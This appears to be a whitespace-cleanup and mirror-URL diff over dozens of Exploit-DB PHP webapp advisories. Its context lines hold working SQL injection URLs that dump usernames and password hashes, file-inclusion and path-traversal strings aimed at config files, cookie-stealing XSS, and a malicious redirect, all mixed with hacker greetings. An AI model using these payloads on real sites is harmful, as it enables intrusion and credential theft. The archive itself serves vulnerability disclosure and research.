[ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr-- - - - + ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr-- \ No newline at end of file diff --git a/exploits/php/webapps/12410.txt b/exploits/php/webapps/12410.txt index 9bd78730a..62416aba8 100644 --- a/exploits/php/webapps/12410.txt +++ b/exploits/php/webapps/12410.txt @@ -26,9 +26,4 @@ modules.php?op=modload&name=News&file=article&sid=[ SQL ] [ Demo] -http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users-- - - - - - +http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users-- \ No newline at end of file diff --git a/exploits/php/webapps/12415.txt b/exploits/php/webapps/12415.txt index 228119745..0427ca244 100644 --- a/exploits/php/webapps/12415.txt +++ b/exploits/php/webapps/12415.txt @@ -22,6 +22,4 @@ ShoutZ : Greetz : -------- - ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MaYuR-- - - + ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MaYuR-- \ No newline at end of file diff --git a/exploits/php/webapps/12552.txt b/exploits/php/webapps/12552.txt index fd74c6591..867918ac3 100644 --- a/exploits/php/webapps/12552.txt +++ b/exploits/php/webapps/12552.txt @@ -20,4 +20,4 @@ http://localhost/teknoportal/makale.php?id=-1+union+select+0,1,version(),3,4,5,6 ------------------------------------------------------------------------------------------- -Herşey Vatan İçin; +Herşey Vatan İçin; \ No newline at end of file diff --git a/exploits/php/webapps/12591.txt b/exploits/php/webapps/12591.txt index a336b0ace..a666e2f6d 100644 --- a/exploits/php/webapps/12591.txt +++ b/exploits/php/webapps/12591.txt @@ -32,4 +32,4 @@ line ; 51 and 52 my friend : liar - sm Hacker -baby hacker -dmar - mr.JLD - ALhal alsab - adil - Mr.SaTaN - abo badr - aStoorh alqssim - Ramad Hacker- h-ex - - yousfe - Hiter.3rb - QAHER ALRAFDE - DjHacker - My Heart - + yousfe - Hiter.3rb - QAHER ALRAFDE - DjHacker - My Heart - \ No newline at end of file diff --git a/exploits/php/webapps/12596.txt b/exploits/php/webapps/12596.txt index 754b7e6ee..3696ae540 100644 --- a/exploits/php/webapps/12596.txt +++ b/exploits/php/webapps/12596.txt @@ -50,4 +50,4 @@ and when you put {order+by+1} after id you can see the normal page # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/12597.txt b/exploits/php/webapps/12597.txt index 172ecc967..b0a139010 100644 --- a/exploits/php/webapps/12597.txt +++ b/exploits/php/webapps/12597.txt @@ -41,4 +41,4 @@ page.php?id=-4+union+all+select+1,@@version,3,4-- # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/12617.txt b/exploits/php/webapps/12617.txt index 92bd21777..436f94391 100644 --- a/exploits/php/webapps/12617.txt +++ b/exploits/php/webapps/12617.txt @@ -27,5 +27,5 @@ Test Environment: ==================================================================== Download the following file for more instructions and exploits: -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12617.zip (file_thingie_v255_Jeremiah.zip) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12617.zip (file_thingie_v255_Jeremiah.zip) ==================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/12635.txt b/exploits/php/webapps/12635.txt index 2192d09fd..28a651b26 100644 --- a/exploits/php/webapps/12635.txt +++ b/exploits/php/webapps/12635.txt @@ -29,6 +29,4 @@ HCJ - g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers ! - - + g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers ! \ No newline at end of file diff --git a/exploits/php/webapps/12651.txt b/exploits/php/webapps/12651.txt index 3fa61c0cd..165f9f4e4 100644 --- a/exploits/php/webapps/12651.txt +++ b/exploits/php/webapps/12651.txt @@ -25,7 +25,4 @@ * Fuck to Malaysia <= the truly thief asia * For HaMaDa SCoOoRPioN are you layz????? copy my exploit??? http://securityreason.com/securityalert/7161 - http://securityreason.com/exploitalert/7413 Look Date!!! your copy my style!!! - - - + http://securityreason.com/exploitalert/7413 Look Date!!! your copy my style!!! \ No newline at end of file diff --git a/exploits/php/webapps/12671.txt b/exploits/php/webapps/12671.txt index 0672e30ed..e455c727d 100644 --- a/exploits/php/webapps/12671.txt +++ b/exploits/php/webapps/12671.txt @@ -39,5 +39,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12709.txt b/exploits/php/webapps/12709.txt index 50d4794b9..d6921d3bf 100644 --- a/exploits/php/webapps/12709.txt +++ b/exploits/php/webapps/12709.txt @@ -46,8 +46,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12713.txt b/exploits/php/webapps/12713.txt index af9a1315d..7668bfc3e 100644 --- a/exploits/php/webapps/12713.txt +++ b/exploits/php/webapps/12713.txt @@ -46,6 +46,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12714.txt b/exploits/php/webapps/12714.txt index 9c16a4dce..cd9bb1362 100644 --- a/exploits/php/webapps/12714.txt +++ b/exploits/php/webapps/12714.txt @@ -46,6 +46,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12735.txt b/exploits/php/webapps/12735.txt index 0b2844661..244d4fd32 100644 --- a/exploits/php/webapps/12735.txt +++ b/exploits/php/webapps/12735.txt @@ -50,6 +50,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12761.txt b/exploits/php/webapps/12761.txt index ccf270f84..2f8d5bf6d 100644 --- a/exploits/php/webapps/12761.txt +++ b/exploits/php/webapps/12761.txt @@ -45,9 +45,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12793.txt b/exploits/php/webapps/12793.txt index 1861a5781..dc3ae2260 100644 --- a/exploits/php/webapps/12793.txt +++ b/exploits/php/webapps/12793.txt @@ -47,9 +47,4 @@ am nt hacker just Lik3 Syst3m S3curity .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/13776.txt b/exploits/php/webapps/13776.txt index 5a77f7656..edf2681be 100644 --- a/exploits/php/webapps/13776.txt +++ b/exploits/php/webapps/13776.txt @@ -16,4 +16,4 @@ user who is able to add or modify Vendors, Customers, Employees or Inventary ite Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13776.pdf (cybsec_advisory_2010_0603_Phreebooks_v2_0_Multiple_Permanent_Cross_site_Scripting.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13776.pdf (cybsec_advisory_2010_0603_Phreebooks_v2_0_Multiple_Permanent_Cross_site_Scripting.pdf) \ No newline at end of file diff --git a/exploits/php/webapps/13777.txt b/exploits/php/webapps/13777.txt index ca28b02a3..a8727c1b7 100644 --- a/exploits/php/webapps/13777.txt +++ b/exploits/php/webapps/13777.txt @@ -17,4 +17,4 @@ The files are included into the scripts and its contents executed by the server. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13777.pdf (cybsec_advisory_2010_0602_Phreebooks_v2_0_Local_File_Inclusion.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13777.pdf (cybsec_advisory_2010_0602_Phreebooks_v2_0_Local_File_Inclusion.pdf) \ No newline at end of file diff --git a/exploits/php/webapps/13778.txt b/exploits/php/webapps/13778.txt index f092efa05..c91539c4e 100644 --- a/exploits/php/webapps/13778.txt +++ b/exploits/php/webapps/13778.txt @@ -16,4 +16,4 @@ move up to root directory, thus permitting navigation through the file system. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13778.pdf (cybsec_advisory_2010_0601_Phreebooks_v2_0_Directory_Traversal.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13778.pdf (cybsec_advisory_2010_0601_Phreebooks_v2_0_Directory_Traversal.pdf) \ No newline at end of file diff --git a/exploits/php/webapps/14160.txt b/exploits/php/webapps/14160.txt index 0f51f80ac..12cd101af 100644 --- a/exploits/php/webapps/14160.txt +++ b/exploits/php/webapps/14160.txt @@ -22,5 +22,4 @@ Content-Length: 146 op=add&userid=consultor1&password_changed=true&PASS1=xxxx&PASS2=xxxx&desc=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&access_rights=reportonly #################################################################################### -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14160.pdf - +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14160.pdf \ No newline at end of file diff --git a/exploits/php/webapps/14199.txt b/exploits/php/webapps/14199.txt index 59bec8ebf..439df6a5f 100644 --- a/exploits/php/webapps/14199.txt +++ b/exploits/php/webapps/14199.txt @@ -67,4 +67,4 @@ Put [SQL CODE] >>> Proude To Be A Kashmiri+Pakistani<<< >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010 +>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010 \ No newline at end of file diff --git a/exploits/php/webapps/14426.pl b/exploits/php/webapps/14426.pl index 0b0353bcb..ca0589871 100755 --- a/exploits/php/webapps/14426.pl +++ b/exploits/php/webapps/14426.pl @@ -68,4 +68,4 @@ sub exploit () } #Exploit failed... print "- Exploit failed\n" -} +} \ No newline at end of file diff --git a/exploits/php/webapps/14458.txt b/exploits/php/webapps/14458.txt index 140c2009f..ccf715f89 100644 --- a/exploits/php/webapps/14458.txt +++ b/exploits/php/webapps/14458.txt @@ -37,4 +37,4 @@ http://www.Victime.com/sNews/index.php?id= ==================================================== -Greetingz To SlaSSi & Xella +Greetingz To SlaSSi & Xella \ No newline at end of file diff --git a/exploits/php/webapps/14502.txt b/exploits/php/webapps/14502.txt index 1e0e2a4a9..d93250e38 100644 --- a/exploits/php/webapps/14502.txt +++ b/exploits/php/webapps/14502.txt @@ -19,5 +19,4 @@ http://www.site.com/path/index.php?option=com_beamospetition&startpage=3&pet=-1 +Union+select+user()+from+jos_users-- ############################################################ Greetz @ Flit0x-Dz AnD MCA-CRB All "DZ" "MusliM" -############################################################ - +############################################################ \ No newline at end of file diff --git a/exploits/php/webapps/14556.txt b/exploits/php/webapps/14556.txt index d6c28f04d..ef451f009 100644 --- a/exploits/php/webapps/14556.txt +++ b/exploits/php/webapps/14556.txt @@ -19,4 +19,4 @@ SQL Error => www.site.com/modules/Partenaires/clic.php?id=8 [Blind] -#################################################################### +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/14592.txt b/exploits/php/webapps/14592.txt index 8f0e43899..3544bfe00 100644 --- a/exploits/php/webapps/14592.txt +++ b/exploits/php/webapps/14592.txt @@ -21,5 +21,4 @@ http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT +Union+select+user()+from+jos_users-- ############################################################ #.Türk oğlu, !!..Türk kızı !!..Türklügünü Koru!.. -############################################################ - +############################################################ \ No newline at end of file diff --git a/exploits/php/webapps/14618.txt b/exploits/php/webapps/14618.txt index a68c86159..4af1c6f2f 100644 --- a/exploits/php/webapps/14618.txt +++ b/exploits/php/webapps/14618.txt @@ -14,6 +14,4 @@ Exploit: http://target/SaurusCMSupdate4.7.0/saurus_cms_upd4.7.0/com_del.php?clas ____________________________________________ A special tribute to: -DannY.iRaQi - TeaM iRaQ HaCkers - - +DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/exploits/php/webapps/14637.txt b/exploits/php/webapps/14637.txt index 93b3117ae..882988999 100644 --- a/exploits/php/webapps/14637.txt +++ b/exploits/php/webapps/14637.txt @@ -32,4 +32,4 @@ Column : 1064 http://127.0.0.1/path/video.php?id=-4444 union select swfurl 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from archive -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/14639.txt b/exploits/php/webapps/14639.txt index dc1f7313d..809bee0bd 100644 --- a/exploits/php/webapps/14639.txt +++ b/exploits/php/webapps/14639.txt @@ -9,7 +9,4 @@ +++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: http://target/MailForm/HTML/index.php?theme=[EV!L] +++++++++++++++++++++++++++++++++++++++++++++++++++++ -A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers - - - +A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/exploits/php/webapps/14655.txt b/exploits/php/webapps/14655.txt index 439a47c2e..114a46b93 100644 --- a/exploits/php/webapps/14655.txt +++ b/exploits/php/webapps/14655.txt @@ -23,4 +23,4 @@ http://www.site.com/path/index.php?option=com_equipment&task=components&id=45&se Greetz @ MCA-CRB All "DZ" "MusliM" ############################################################ ======[saha fotorkom]====== -############################################################ +############################################################ \ No newline at end of file diff --git a/exploits/php/webapps/14659.txt b/exploits/php/webapps/14659.txt index fc64065be..830b81867 100644 --- a/exploits/php/webapps/14659.txt +++ b/exploits/php/webapps/14659.txt @@ -31,4 +31,4 @@ http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- ŞeHiT GeLdi ÖLümLü YaLan, GiTTi ÖLümSüzLügü GerÇek. Siz HaYaT SüRen LeşLer, SiZi Kim DiRiLTecek?.. =================================================== -Greetz : 1923Turk All Users +Greetz : 1923Turk All Users \ No newline at end of file diff --git a/exploits/php/webapps/14712.txt b/exploits/php/webapps/14712.txt index 8680a13f6..74435f680 100644 --- a/exploits/php/webapps/14712.txt +++ b/exploits/php/webapps/14712.txt @@ -9,9 +9,4 @@ +++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL] +++++++++++++++++++++++++++++++++++++++++++++++++++++ -A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers - - - - - +A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/exploits/php/webapps/14722.txt b/exploits/php/webapps/14722.txt index 9c5851b95..6cb9f4129 100644 --- a/exploits/php/webapps/14722.txt +++ b/exploits/php/webapps/14722.txt @@ -60,5 +60,4 @@ Joomla! (Multiple) ExploiT # Thanks : milw0rm.com & exploit-db.com & offsec.com & inj3ct0r.com & www.hack0wn.com -exit ,, / Praise be to God for the blessing of Islam - +exit ,, / Praise be to God for the blessing of Islam \ No newline at end of file diff --git a/exploits/php/webapps/14799.txt b/exploits/php/webapps/14799.txt index f21db0e26..a22ea50b8 100644 --- a/exploits/php/webapps/14799.txt +++ b/exploits/php/webapps/14799.txt @@ -9,9 +9,4 @@ +++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL] +++++++++++++++++++++++++++++++++++++++++++++++++++++ -A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers - - - - - +A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/exploits/php/webapps/14817.txt b/exploits/php/webapps/14817.txt index 6ea49272d..a1e7851ec 100644 --- a/exploits/php/webapps/14817.txt +++ b/exploits/php/webapps/14817.txt @@ -41,4 +41,4 @@ SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ===========================all my friend =================================== * PrX Hacker * Hacker Boy * AbUbAdR * mAsH3L ALLiL * DMaR AL-TMiMi | -* Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA | +* Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA | \ No newline at end of file diff --git a/exploits/php/webapps/14819.html b/exploits/php/webapps/14819.html index 809f2056a..83cc98e1a 100644 --- a/exploits/php/webapps/14819.html +++ b/exploits/php/webapps/14819.html @@ -50,4 +50,4 @@ Email : R7e@HoTMaiL.coM</font></b></p> </center> -</html> +</html> \ No newline at end of file diff --git a/exploits/php/webapps/14823.txt b/exploits/php/webapps/14823.txt index e91c86451..0b9d5b53c 100644 --- a/exploits/php/webapps/14823.txt +++ b/exploits/php/webapps/14823.txt @@ -34,4 +34,4 @@ SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited * Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA | -=========================| -=[ THE END]=- |========================= +=========================| -=[ THE END]=- |========================= \ No newline at end of file diff --git a/exploits/php/webapps/14827.py b/exploits/php/webapps/14827.py index e0c530e37..c5d90b879 100755 --- a/exploits/php/webapps/14827.py +++ b/exploits/php/webapps/14827.py @@ -77,7 +77,4 @@ if len(sys.argv) != 4: else: exploit(sys.argv[1], sys.argv[2], sys.argv[3]) -exit(0) - - - +exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/14834.txt b/exploits/php/webapps/14834.txt index cceb283ae..c4dd762cf 100644 --- a/exploits/php/webapps/14834.txt +++ b/exploits/php/webapps/14834.txt @@ -31,4 +31,4 @@ Add A New Comment And The exploit is in Name :) -Peace +Peace \ No newline at end of file diff --git a/exploits/php/webapps/14837.txt b/exploits/php/webapps/14837.txt index ef8af06a4..7c6ccf176 100644 --- a/exploits/php/webapps/14837.txt +++ b/exploits/php/webapps/14837.txt @@ -25,5 +25,4 @@ http://localhost/cf_image_host_v1.3.81/inc/config.php?settings[SET_LANGUAGE]=[EV ======================================================================================================= Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz -Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE - +Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE \ No newline at end of file diff --git a/exploits/php/webapps/14839.txt b/exploits/php/webapps/14839.txt index 9bbe338d4..d1e0d69ee 100644 --- a/exploits/php/webapps/14839.txt +++ b/exploits/php/webapps/14839.txt @@ -30,5 +30,4 @@ Put on the name & body of your comment any html code like: <meta http-equiv="refresh" content="0;url=http://sa-virus.com/" /> <==== ( thats redirecting to sa-virus.com ) [~] Another note : You can bypass the limit of comments per day in this guestbook script -By deleting the saved cookie in your computer ;) - +By deleting the saved cookie in your computer ;) \ No newline at end of file diff --git a/exploits/php/webapps/14841.txt b/exploits/php/webapps/14841.txt index 14ce61319..67733f1a1 100644 --- a/exploits/php/webapps/14841.txt +++ b/exploits/php/webapps/14841.txt @@ -29,5 +29,4 @@ http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L] ======================================================================================================= Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz -Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE - +Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE \ No newline at end of file diff --git a/exploits/php/webapps/14849.py b/exploits/php/webapps/14849.py index b081f496a..201cbb4f1 100755 --- a/exploits/php/webapps/14849.py +++ b/exploits/php/webapps/14849.py @@ -78,6 +78,4 @@ if len(sys.argv) != 3: else: exploit(sys.argv[1], sys.argv[2]) -exit(0) - - +exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/14860.txt b/exploits/php/webapps/14860.txt index 0273b94e4..5997f160d 100644 --- a/exploits/php/webapps/14860.txt +++ b/exploits/php/webapps/14860.txt @@ -14,4 +14,4 @@ http://www.site.com/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sb [#] Greetings: -[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ... +[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ... \ No newline at end of file diff --git a/exploits/php/webapps/14891.txt b/exploits/php/webapps/14891.txt index 1b3cb921a..9c84e6dba 100644 --- a/exploits/php/webapps/14891.txt +++ b/exploits/php/webapps/14891.txt @@ -14,4 +14,4 @@ http://www.example.com/classi/detail.php?sid=80 and 1=2-- // False ,, [~] Greetings: -string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends"); +string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends"); \ No newline at end of file diff --git a/exploits/php/webapps/14894.py b/exploits/php/webapps/14894.py index be49b33bd..86e8f9dbb 100755 --- a/exploits/php/webapps/14894.py +++ b/exploits/php/webapps/14894.py @@ -110,5 +110,4 @@ if len(sys.argv) != 3: else: exploit(sys.argv[1], sys.argv[2]) -exit(0) - +exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/14896.txt b/exploits/php/webapps/14896.txt index 67f97751a..442073d6c 100644 --- a/exploits/php/webapps/14896.txt +++ b/exploits/php/webapps/14896.txt @@ -9,9 +9,4 @@ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~] -Greetings: No - - - - - +Greetings: No \ No newline at end of file diff --git a/exploits/php/webapps/14910.txt b/exploits/php/webapps/14910.txt index c8986f8c3..cb537aa19 100644 --- a/exploits/php/webapps/14910.txt +++ b/exploits/php/webapps/14910.txt @@ -30,4 +30,4 @@ else { cout<<"No greeting ..\n"; } -=========================================================== +=========================================================== \ No newline at end of file diff --git a/exploits/php/webapps/14915.txt b/exploits/php/webapps/14915.txt index 0b918e117..a052dc079 100644 --- a/exploits/php/webapps/14915.txt +++ b/exploits/php/webapps/14915.txt @@ -149,5 +149,4 @@ InterPhoto CMS has used Smarty library(Templet Engine). Add frist page : if(class_exists('Smarty')){ Add last page: - } - + } \ No newline at end of file diff --git a/exploits/php/webapps/14927.txt b/exploits/php/webapps/14927.txt index 8d0e79d7d..c7d1c4949 100644 --- a/exploits/php/webapps/14927.txt +++ b/exploits/php/webapps/14927.txt @@ -64,6 +64,4 @@ DynPage is written in PHP and does not require MySQL database. It's easy to inst $_SESSION['DYNPAGE_CONF_VAR_ALL']['admin_email']="a@a.com"; ?> +POC:for see this hash: - http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00 - - + http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00 \ No newline at end of file diff --git a/exploits/php/webapps/14931.php b/exploits/php/webapps/14931.php index 935e71951..f15d58958 100644 --- a/exploits/php/webapps/14931.php +++ b/exploits/php/webapps/14931.php @@ -121,5 +121,4 @@ $guyanarules = new Javabridgexploit($argv); -?> - +?> \ No newline at end of file diff --git a/exploits/php/webapps/14960.txt b/exploits/php/webapps/14960.txt index eb86a92c1..06073d6e3 100644 --- a/exploits/php/webapps/14960.txt +++ b/exploits/php/webapps/14960.txt @@ -14,4 +14,4 @@ +Download : www.energyscripts.com/projects/essdownload/essdownload1.0.zip +Vulnerability : www.your script/download.php?PHPSESSID="Your Senssid"&file=../***** +Password Exploitable : www.your script/download.php?PHPSESSID="Your Senssid"&file=../../config.php ------------------------------------------------------------------------------------------ +----------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/14985.txt b/exploits/php/webapps/14985.txt index 9617191a2..ed598bbef 100644 --- a/exploits/php/webapps/14985.txt +++ b/exploits/php/webapps/14985.txt @@ -30,5 +30,4 @@ Greetz to all brothers & sisters who are fighting for freedom in IRAN... خدا شما کمک خواهد کرد -contact : secret_hf@hotmail.com - +contact : secret_hf@hotmail.com \ No newline at end of file diff --git a/exploits/php/webapps/14989.txt b/exploits/php/webapps/14989.txt index b646f981b..b13012c13 100644 --- a/exploits/php/webapps/14989.txt +++ b/exploits/php/webapps/14989.txt @@ -57,4 +57,4 @@ Muslim & Tunisian Hacker EnJoY o_O -./3x17 +./3x17 \ No newline at end of file diff --git a/exploits/php/webapps/14996.txt b/exploits/php/webapps/14996.txt index 4d8a81ca0..e746f430f 100644 --- a/exploits/php/webapps/14996.txt +++ b/exploits/php/webapps/14996.txt @@ -28,4 +28,4 @@ in GetTemplate function , line 113 to 127 [#] Greetings: Dr.2 , darkc0de team , inj3ct0r's Community , and all ma friends ,, -== +== \ No newline at end of file diff --git a/exploits/php/webapps/15090.txt b/exploits/php/webapps/15090.txt index 6e3487ada..ba1dc38c0 100644 --- a/exploits/php/webapps/15090.txt +++ b/exploits/php/webapps/15090.txt @@ -36,4 +36,4 @@ http://site/index.php?service=5&id=-4375+UNION+SELECT+1,2,3,concat(user,0x3a,pas -Good Luck +Good Luck \ No newline at end of file diff --git a/exploits/php/webapps/15121.txt b/exploits/php/webapps/15121.txt index 157e13c45..df58862d8 100644 --- a/exploits/php/webapps/15121.txt +++ b/exploits/php/webapps/15121.txt @@ -56,5 +56,4 @@ Mail : !x! -{Greetz} All my friends |No-Exploit.com Members -------------------------------------- - +------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/15154.txt b/exploits/php/webapps/15154.txt index 0cc9459b1..2d815b268 100644 --- a/exploits/php/webapps/15154.txt +++ b/exploits/php/webapps/15154.txt @@ -17,4 +17,4 @@ then get username & password n then go to the admin panel ,, # Greetings: Dr.2 , Inject0r's Community , AsbMay's Group , darkc0de team , and all ma friends ,, -== +== \ No newline at end of file diff --git a/exploits/php/webapps/15173.txt b/exploits/php/webapps/15173.txt index 67d8154b2..cc41ad409 100644 --- a/exploits/php/webapps/15173.txt +++ b/exploits/php/webapps/15173.txt @@ -31,4 +31,4 @@ www.site.com/detail_article.php?C=3&P=1 and 1=2 <-- false www.site.com/detail_article.php?C=3&P=7"><script>alert(document.cookie);</script> - #################################################################### + #################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/15223.txt b/exploits/php/webapps/15223.txt index 79637e371..2a183fe71 100644 --- a/exploits/php/webapps/15223.txt +++ b/exploits/php/webapps/15223.txt @@ -24,4 +24,4 @@ AQ. "Rüyalarýma bitek Uyuyoken kavuþuyosam Anladýmki Ölmekte zor 